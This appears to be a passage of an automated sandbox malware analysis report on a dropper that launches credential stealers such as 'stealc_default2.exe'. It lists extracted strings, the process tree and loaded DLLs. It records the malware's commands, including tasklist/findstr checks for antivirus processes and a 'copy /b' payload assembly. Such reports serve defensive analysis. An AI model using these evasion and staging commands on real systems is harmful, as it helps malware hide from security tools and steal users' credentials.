Source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.31.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000014.00000002.2071814033.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2071814033.0000000003136000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000003095000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.000000000307F000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000003.2017428886.00000000214A9000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000003.2034188438.00000000214C4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192869991.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2191508724.0000000003174000.00000004.00000020.00020000.00000000.sdmp, DAKFCGIJKJKFHIDHIIIE.31.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.31.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: PQ2AUndsdb.exe

ReversingLabs: Detection: 65%

Source: PQ2AUndsdb.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

File read: C:\Users\user\Desktop\PQ2AUndsdb.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PQ2AUndsdb.exe "C:\Users\user\Desktop\PQ2AUndsdb.exe"
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\GOLD.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user~1\AppData\Local\Temp\1000004001\crypteda.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe "C:\Users\user\AppData\Roaming\wxfM3haI2K.exe"
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\XBckuYbXje.exe "C:\Users\user\AppData\Roaming\XBckuYbXje.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe "C:\Users\user~1\AppData\Local\Temp\1000005001\setup2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe "C:\Users\user~1\AppData\Local\Temp\1000129001\Set-up.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe "C:\Users\user~1\AppData\Local\Temp\1000150001\runtime.exe"
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe "C:\Users\user~1\AppData\Local\Temp\1000190001\XClient_protected.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 40365
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "HopeBuildersGeniusIslam" Sonic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\GOLD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user~1\AppData\Local\Temp\1000004001\crypteda.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe "C:\Users\user~1\AppData\Local\Temp\1000005001\setup2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe "C:\Users\user~1\AppData\Local\Temp\1000129001\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe "C:\Users\user~1\AppData\Local\Temp\1000150001\runtime.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe "C:\Users\user~1\AppData\Local\Temp\1000190001\XClient_protected.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe "C:\Users\user\AppData\Roaming\wxfM3haI2K.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\XBckuYbXje.exe "C:\Users\user\AppData\Roaming\XBckuYbXje.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 40365
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "HopeBuildersGeniusIslam" Sonic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
